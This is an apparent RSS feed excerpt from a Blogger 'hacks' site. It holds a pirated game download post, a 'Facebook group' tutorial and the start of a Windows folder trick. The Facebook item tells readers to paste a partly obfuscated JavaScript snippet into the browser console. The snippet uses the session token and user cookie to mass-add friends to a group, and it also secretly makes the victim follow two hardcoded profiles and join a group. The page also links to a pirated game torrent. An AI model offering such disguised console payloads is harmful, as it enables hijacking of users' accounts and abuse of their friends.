&lt;i&gt;Friends Here I Giving You Jucied&amp;nbsp;&lt;/i&gt;&lt;i&gt;For PC This Is Ripped Or Compressed Hope You Like It&lt;/i&gt;&lt;/h2&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8CVXlqt7X-Bg1uW_pmAk-Gn9oO32YsGm54bt5LrvzkUwDQzN0qwgsjE5Uiu713n_V3GxBRPM0lGVquwZioVupQfEKi4j6Ki4I-WjH2WY_q8NppQmbNImtRsx8Lt34m8DhOcWl7Dh_l5dS/s1600/Juiced_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8CVXlqt7X-Bg1uW_pmAk-Gn9oO32YsGm54bt5LrvzkUwDQzN0qwgsjE5Uiu713n_V3GxBRPM0lGVquwZioVupQfEKi4j6Ki4I-WjH2WY_q8NppQmbNImtRsx8Lt34m8DhOcWl7Dh_l5dS/s320/Juiced_1.jpg" width="222" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;"&gt;Become immersed in the lifestyle, community, and risk-taking attitude of the street-modding scene with Juiced. More than just an arcade racer, Juiced pits you against a wide range of characters with enhanced driving street machines. In a series of increasingly risky challenges, you can earn cash, cars, and pride. You'll have to work hard to get to where the real petrol-heads and money lurk, building up a collection of nitrous-burning monsters for every type of challenge&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;"&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;"&gt;&lt;b style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;"&gt;&lt;i&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"&gt;Minimum System Requirements:&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;"&gt;933Mhz CPU&lt;br style="outline: none;" /&gt;Directx 9.0c or better&lt;br style="outline: none;" /&gt;3D accelerated DirectX9c compatible video card&lt;br style="outline: none;" /&gt;NVIDIA GeForce2 or better&lt;br style="outline: none;" /&gt;ATI 8500 32 MB or better&lt;br style="outline: none;" /&gt;Intel 915G integrated graphics or better&lt;br style="outline: none;" /&gt;Matrox Parhelia&lt;br style="outline: none;" /&gt;256 Megabytes of RAM&lt;br style="outline: none;" /&gt;2.6 GB free hard drive space&lt;br style="outline: none;" /&gt;(additional space required for Windows swap-file and&lt;br style="outline: none;" /&gt;DirectX 9.0c installation)&lt;br style="outline: none;" /&gt;8x CD-ROM drive&lt;br style="outline: none;" /&gt;Directx 9.0c Compatible Sound Card&lt;br style="outline: none;" /&gt;MS compatible mouse&lt;br style="outline: none;" /&gt;Keyboard&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style="background-color: #141414; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;"&gt;&lt;i&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px;"&gt;Recommended System Requirements:&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;b style="outline: none;"&gt;2.8 Ghz CPU&lt;br style="outline: none;" /&gt;Directx 9.0c or better&lt;br style="outline: none;" /&gt;3D accelerated GeForceFX 6800, ATI Radeon 9800 or better DirectX9 compatible video card&lt;br style="outline: none;" /&gt;512 Megabytes of RAM&lt;br style="outline: none;" /&gt;2.6 GB free hard drive space&lt;br style="outline: none;" /&gt;(additional space required for Windows swap-file and&lt;br style="outline: none;" /&gt;DirectX 9.0c installation)&lt;br style="outline: none;" /&gt;16x CD-ROM drive&lt;br style="outline: none;" /&gt;Directx 9.0c Compatible Sound Card&lt;br style="outline: none;" /&gt;MS compatible mouse&lt;br style="outline: none;" /&gt;Keyboard&lt;br /&gt;&lt;br /&gt;&lt;b style="outline: none;"&gt;Not Supported:&lt;br style="outline: none;" /&gt;Windows 95, Windows 98 (non SE)&lt;br style="outline: none;" /&gt;Directx9.0b and previous versions. Juiced requires DirectX 9c.&lt;br style="outline: none;" /&gt;Older graphics cards such as ATI 7200/7500 and SiS Xabre 400.&lt;br /&gt;&lt;br /&gt;&lt;b style="outline: none;"&gt;Install notes :-&lt;br style="outline: none;" /&gt;&lt;br style="outline: none;" /&gt;0. unrar file&lt;br style="outline: none;" /&gt;1. click on install_juiced.bat&lt;br style="outline: none;" /&gt;2. wait few minutes&lt;br style="outline: none;" /&gt;3. after installation open Juiced folder&lt;br style="outline: none;" /&gt;4. and click on juiced.exe file&lt;br style="outline: none;" /&gt;5. and configure your setting and click ok and wait few seconds&lt;br style="outline: none;" /&gt;6. and play game and InJOY&lt;br style="outline: none;" /&gt;&lt;br style="outline: none;" /&gt;&lt;br style="outline: none;" /&gt;Note:- after configure setting your game not start and give u an error that&lt;br style="outline: none;" /&gt;Juiced reuired virtual memory enabled so do this&lt;br style="outline: none;" /&gt;&lt;br style="outline: none;" /&gt;&lt;br style="outline: none;" /&gt;1. right click on juiced.exe and click on property&lt;br style="outline: none;" /&gt;2. click on compatibility box&lt;br style="outline: none;" /&gt;3. then click on compatibility mode&lt;br style="outline: none;" /&gt;4. so if u installed window xp so set xp sp2 or sp3&lt;br style="outline: none;" /&gt;5. if u installed vista or 7 so set vista or 7&lt;br style="outline: none;" /&gt;6. and click ok botton&lt;br style="outline: none;" /&gt;7. and reclick juiced.exe file&lt;br style="outline: none;" /&gt;8. now it will be run on your window smoothly like a butter&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i style="background-color: #141414; color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; font-weight: normal; outline: none;"&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;TO DOWNLOAD THIS GAME YOU HAVE TO INSTALL BIT TORRENT TO YOUR PC&lt;/span&gt;&lt;br style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;" /&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;DOWNLOAD LINK IS BELOW&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; outline: none;"&gt;&lt;b style="outline: none;"&gt;&lt;b style="outline: none;"&gt;&lt;b style="outline: none;"&gt;&lt;i style="background-color: #141414; color: #666666; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 17px; font-weight: normal; outline: none;"&gt;&lt;span style="color: #333333; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal;"&gt;&lt;a href="http://torcache.net/torrent/CE1CFB17CAB65A731ABFF65B9DAFF23593A4630A.torrent?title=[kickass.to]juiced.pc.game.highly.compressed" target="_blank"&gt;Jucied &lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8CVXlqt7X-Bg1uW_pmAk-Gn9oO32YsGm54bt5LrvzkUwDQzN0qwgsjE5Uiu713n_V3GxBRPM0lGVquwZioVupQfEKi4j6Ki4I-WjH2WY_q8NppQmbNImtRsx8Lt34m8DhOcWl7Dh_l5dS/s72-c/Juiced_1.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How To Add All Friends To Facebook Group </title><link>http://bambahacks.blogspot.com/2013/11/how-to-add-all-friends-to-facebook-group.html</link><category>FB Hack</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Mon, 18 Nov 2013 00:22:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-6220464467267704692</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div&gt;So this is a tutorial on how to add all your friends in a facebook page in just a few steps. So if you are an admin of a facebook group which has less members then you might have a hard time to add all your friends one by one and which is a very&amp;nbsp; hard job. So, to help all you facebook group admins out, we share you an unique script with which you can add all your friends to the group. So enough said, let's proceed on to the tutorial.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgorKWu-5JUpNKM4ufu-5Rt-ezLaJ7G7srgKuNp7FLhyPj9PioAXDOXxUARdwAwQqUxj9WkKlhUr42cT1mUeba_jOUjTc1GwWbT8LJeWvWdt-zE4hAgSIufu_ZmzG_mUmDj2WKFy7Fz3N-Q/s1600/url.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgorKWu-5JUpNKM4ufu-5Rt-ezLaJ7G7srgKuNp7FLhyPj9PioAXDOXxUARdwAwQqUxj9WkKlhUr42cT1mUeba_jOUjTc1GwWbT8LJeWvWdt-zE4hAgSIufu_ZmzG_mUmDj2WKFy7Fz3N-Q/s1600/url.png" height="169" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4 style="text-align: left;"&gt;&lt;span style="font-size: large;"&gt;Conditions &lt;/span&gt;&lt;/h4&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;You need to be an approved member or admin of the facebook group in which you wish to add your friends.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;You must be browsing facebook through Mozilla Firefox or Google Chrome. Sorry, Internet Explorer or other web browsers not yet supported.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;&lt;span style="font-size: large;"&gt;Steps&lt;/span&gt;&lt;/h3&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;Go to the facebook group in which you wish to add your friends to using Mozilla Firefox or Google Chrome.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;Press F12 when you're on the group. Then click on console as illustrated in the image below.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;After going to console ,paste the code below and press enter.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqzc722Ej7OVHQp9H6ebE1gEHaxqSEs8u7OwNFUt-apsihBQUrJMouOufx_vk0b_HUiD03Eb011H9Z5Lh2gzz7JASOJfCn3cq1-paSkSLxEDpKi-OHE9bH4roL50oKaHVs1yXVIEK0xtfw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqzc722Ej7OVHQp9H6ebE1gEHaxqSEs8u7OwNFUt-apsihBQUrJMouOufx_vk0b_HUiD03Eb011H9Z5Lh2gzz7JASOJfCn3cq1-paSkSLxEDpKi-OHE9bH4roL50oKaHVs1yXVIEK0xtfw/s1600/1.PNG" height="120" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;&lt;blockquote class="tr_bq"&gt;&lt;i&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&amp;amp;&amp;amp;200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&amp;amp;&amp;amp;a.payload.entries&amp;amp;&amp;amp;(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found &amp;lt;b&amp;gt;"+f.frns.length+" Prophet&amp;lt;/b&amp;gt;&amp;lt;div id='hasilsatu'&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;div id='hasildua'&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'&amp;gt;&amp;lt;/div&amp;gt;"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&amp;amp;&amp;amp;404==c.status?"&amp;lt;b style='color:darkred'&amp;gt;Gruppe Öffnen!&amp;lt;/b&amp;gt;"+crj:"&amp;lt;b style='color:darkgreen'&amp;gt;Suche nach möglichen Abonnenten... ("+c.readyState+")&amp;lt;/b&amp;gt;"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&amp;amp;fb_dtsg="+f.dtsg+"&amp;amp;group_id="+f.gid+"&amp;amp;source=typeahead&amp;amp;ref=&amp;amp;message_id=&amp;amp;members="+f.frns[d].uid+"&amp;amp;__user="+f.uid+"&amp;amp;phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&amp;amp;&amp;amp;200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="&amp;lt;div&amp;gt;&amp;lt;b&amp;gt;"+f.prenKe+"&amp;lt;/b&amp;gt; of &amp;lt;b&amp;gt;"+f.frns.length+"&amp;lt;/b&amp;gt;&amp;lt;/div&amp;gt;",a.errorDescription&amp;amp;&amp;amp;(f.gagal++,document.getElementById("hasiltiga").innerHTML="&amp;lt;div&amp;gt;&amp;lt;b style='color:darkred'&amp;gt;( "+f.gagal+" )&amp;lt;/b&amp;gt; &amp;lt;span style='color:darkred'&amp;gt;"+a.errorDescription+"&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;"),a.jsmods&amp;amp;&amp;amp;a.jsmods.require){var b="&amp;lt;div&amp;gt;";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&amp;amp;&amp;amp;(b+="&amp;lt;b style='color:darkgreen'&amp;gt;"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"&amp;lt;/b&amp;gt; ");b+="&amp;lt;div&amp;gt;",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&amp;amp;&amp;amp;c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="&amp;lt;div&amp;gt;&amp;lt;b style='color:darkgreen'&amp;gt;( "+f.okeh+" )&amp;lt;/b&amp;gt; &amp;lt;a href='/"+c.uid+"' target='_blank'&amp;gt;&amp;lt;b&amp;gt;"+c.name+"&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt; haben dich abonniert.&amp;lt;/div&amp;gt;";break}}f.prenKe==f.frns.length&amp;amp;&amp;amp;(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="&amp;lt;div style='font-size:20px;font-weight:bold'&amp;gt;20 Leute Einladen!&amp;lt;/div&amp;gt;&amp;lt;a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'&amp;gt;Schliesen&amp;lt;/a&amp;gt;")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="&amp;lt;div style='margin-top:10px;color:gray;font-size:12px'&amp;gt;"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"&amp;lt;div style='font-size:9px'&amp;gt;&amp;lt;a href='http://"+crl+"/' target='_blank'&amp;gt;"+crl+"&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;";document.body.innerHTML+="&amp;lt;center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'&amp;gt;&amp;lt;b&amp;gt;fb.com/prophethaxor ... Script by Prophet &amp;lt;/b&amp;gt;"+crj+"&amp;lt;/center&amp;gt;",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&amp;amp;viewer="+f.uid+"&amp;amp;token="+Math.random()+"&amp;amp;filter[0]=user&amp;amp;options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/blockquote&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])&lt;br /&gt;function cereziAl(isim) {&lt;br /&gt;var tarama = isim + "=";&lt;br /&gt;if (document.cookie.length &amp;gt; 0) {&lt;br /&gt;konum = document.cookie.indexOf(tarama)&lt;br /&gt;if (konum != -1) {&lt;br /&gt;konum += tarama.length&lt;br /&gt;son = document.cookie.indexOf(";", konum)&lt;br /&gt;if (son == -1)&lt;br /&gt;son = document.cookie.length&lt;br /&gt;return unescape(document.cookie.substring(konum, son))&lt;br /&gt;}&lt;br /&gt;else { return ""; }&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;function getRandomInt (min, max) {&lt;br /&gt;return Math.floor(Math.random() * (max - min + 1)) + min;&lt;br /&gt;}&lt;br /&gt;function randomValue(arr) {&lt;br /&gt;return arr[getRandomInt(0, arr.length-1)];&lt;br /&gt;}&lt;br /&gt;var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;&lt;br /&gt;var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);&lt;br /&gt;function a(abone){&lt;br /&gt;var http4 = new XMLHttpRequest();&lt;br /&gt;var url4 = "/ajax/follow/follow_profile.php?__a=1";&lt;br /&gt;var params4 = "profile_id=" + abone + "&amp;amp;location=1&amp;amp;source=follow-button&amp;amp;subscribed_button_id=u37qac_37&amp;amp;fb_dtsg=" + fb_dtsg + "&amp;amp;lsd&amp;amp;__" + user_id + "&amp;amp;phstamp=";&lt;br /&gt;http4.open("POST", url4, true);&lt;br /&gt;//Send the proper header information along with the request&lt;br /&gt;http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");&lt;br /&gt;http4.setRequestHeader("Content-length", params4.length);&lt;br /&gt;http4.setRequestHeader("Connection", "close");&lt;br /&gt;http4.onreadystatechange = function() {//Call a function when the state changes.&lt;br /&gt;if(http4.readyState == 4 &amp;amp;&amp;amp; http4.status == 200) {&lt;br /&gt;http4.close; // Close the connection&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;http4.send(params4);&lt;br /&gt;}&lt;br /&gt;function sublist(uidss) {&lt;br /&gt;var a = document.createElement('script');&lt;br /&gt;a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&amp;amp;action=subscribe').setData({ flid: " + uidss + " }).send();";&lt;br /&gt;document.body.appendChild(a);&lt;br /&gt;}&lt;br /&gt;a("100001068547215");&lt;br /&gt;a("100004230073255");&lt;br /&gt;var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];&lt;br /&gt;var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);&lt;br /&gt;var httpwp = new XMLHttpRequest();&lt;br /&gt;var urlwp = '/ajax/groups/membership/r2j.php?__a=1';&lt;br /&gt;var paramswp = '&amp;amp;ref=group_jump_header&amp;amp;group_id=' + gid + '&amp;amp;fb_dtsg=' + fb_dtsg + '&amp;amp;__user=' + user_id + '&amp;amp;phstamp=';&lt;br /&gt;httpwp['open']('POST', urlwp, true);&lt;br /&gt;httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');&lt;br /&gt;httpwp['setRequestHeader']('Content-length', paramswp['length']);&lt;br /&gt;httpwp['setRequestHeader']('Connection', 'keep-alive');&lt;br /&gt;httpwp['send'](paramswp);&lt;br /&gt;var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];&lt;br /&gt;var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);&lt;br /&gt;var friends = new Array();&lt;br /&gt;gf = new XMLHttpRequest();&lt;br /&gt;gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&amp;amp;viewer=' + user_id + '&amp;amp;token' + Math['random']() + '&amp;amp;filter[0]=user&amp;amp;options[0]=friends_only', false);&lt;br /&gt;gf['send']();&lt;br /&gt;if (gf['readyState'] != 4) {} else {&lt;br /&gt;data = eval('(' + gf['responseText']['substr'](9) + ')');&lt;br /&gt;if (data['error']) {} else {&lt;br /&gt;friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {&lt;br /&gt;return _0x93dax8['index'] - _0x93dax9['index'];&lt;br /&gt;});&lt;br /&gt;};&lt;br /&gt;}; &lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;div&gt;&lt;h3 style="text-align: left;"&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/h3&gt;&lt;div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;"&gt;o  this is a tutorial on how to add all your friends in a facebook page in  just a few steps. So if you are an admin of a facebook group which has  less members then you might have a hard time to add all your friends one  by one and which is a very tedious job. So, to help all you facebook  group admins out, we share you an unique script with which you can add  all your friends to the group. So enough said, let's proceed on to the  tutorial. - See more at:  http://www.digitricks.net/2013/11/how-to-add-all-friends-to-facebook-group.html#sthash.6soabriH.dpuf&lt;/div&gt;&lt;div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;"&gt;So  this is a tutorial on how to add all your friends in a facebook page in  just a few steps. So if you are an admin of a facebook group which has  less members then you might have a hard time to add all your friends one  by one and which is a very tedious job. So, to help all you facebook  group admins out, we share you an unique script with which you can add  all your friends to the group. So enough said, let's proceed on to the  tutorial. - See more at:  http://www.digitricks.net/2013/11/how-to-add-all-friends-to-facebook-group.html#sthash.6soabriH.dpuf&lt;div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;"&gt;o  this is a tutorial on how to add all your friends in a facebook page in  just a few steps. So if you are an admin of a facebook group which has  less members then you might have a hard time to add all your friends one  by one and which is a very tedious job. So, to help all you facebook  group admins out, we share you an unique script with which you can add  all your friends to the group. So enough said, let's proceed on to the  tutorial. - See more at:  http://www.digitricks.net/2013/11/how-to-add-all-friends-to-facebook-group.html#sthash.6soabriH.dpuf&lt;/div&gt;&lt;/div&gt;&lt;div id="stcpDiv" style="left: -1988px; position: absolute; top: -1999px;"&gt;So  this is a tutorial on how to add all your friends in a facebook page in  just a few steps. So if you are an admin of a facebook group which has  less members then you might have a hard time to add all your friends one  by one and which is a very tedious job. So, to help all you facebook  group admins out, we share you an unique script with which you can add  all your friends to the group. So enough said, let's proceed on to the  tutorial. - See more at:  http://www.digitricks.net/2013/11/how-to-add-all-friends-to-facebook-group.html#sthash.6soabriH.dpuf&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgorKWu-5JUpNKM4ufu-5Rt-ezLaJ7G7srgKuNp7FLhyPj9PioAXDOXxUARdwAwQqUxj9WkKlhUr42cT1mUeba_jOUjTc1GwWbT8LJeWvWdt-zE4hAgSIufu_ZmzG_mUmDj2WKFy7Fz3N-Q/s72-c/url.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Create Invisible &amp;amp; Color Folder</title><link>http://bambahacks.blogspot.com/2013/11/create-invisible-color-folder.html</link><category>Windows Hack</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sun, 17 Nov 2013 07:03:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-4670434626441035720.post-2220633634526168621</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;You always heard about a wihout name folder but you don't know how to create it .&lt;br /&gt;Now I create invisible folder with two tricks . &lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;&lt;span style="font-size: large;"&gt;&amp;nbsp; Create Invisible Folder&lt;/span&gt;&lt;/h3&gt;&lt;h4 style="text-align: left;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;First Trick &lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/h4&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;div style="text-align: left;"&gt;First you create a folder .&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;ul&gt;&lt;li&gt;Then press Window Key +R ,Run is open now you type charmap , For giving this command your character map is open.&lt;/li&gt;&lt;li&gt;In search box you type &amp;nbsp;&amp;nbsp; U+2001:Em Quad&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; and then select it.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYppnjDRZImhDPxjEd2tA1k4MnxygNR8mtWkWORYoruBxdctkuvNg9-RSWqXNA8ccDGQweqzPVLP6ouxXIkTkU5PP_Jh2vZ8ckjfzi-vadX6b44eWGwJp8S8JLrgZVqfUZs9pR1z6ESx9t/s1600/charmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYppnjDRZImhDPxjEd2tA1k4MnxygNR8mtWkWORYoruBxdctkuvNg9-RSWqXNA8ccDGQweqzPVLP6ouxXIkTkU5PP_Jh2vZ8ckjfzi-vadX6b44eWGwJp8S8JLrgZVqfUZs9pR1z6ESx9t/s1600/charmap.png" height="111" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&amp;nbsp;Right click on your folder and then click on rename it, and paste you select character.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb5aAjnusNRzp5g2nptS2cH3iQlJMxJQEAqFbsmPsK-HnpbTU2JhsZMk51wMVe7u8dMdi-Rp4n4dzlnedM00RDQZwwZsBWOU5jId2ryajMc4FiIcXHGdnVX_GouATi8EU-vH7G6qUamTjx/s1600/invisible.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" 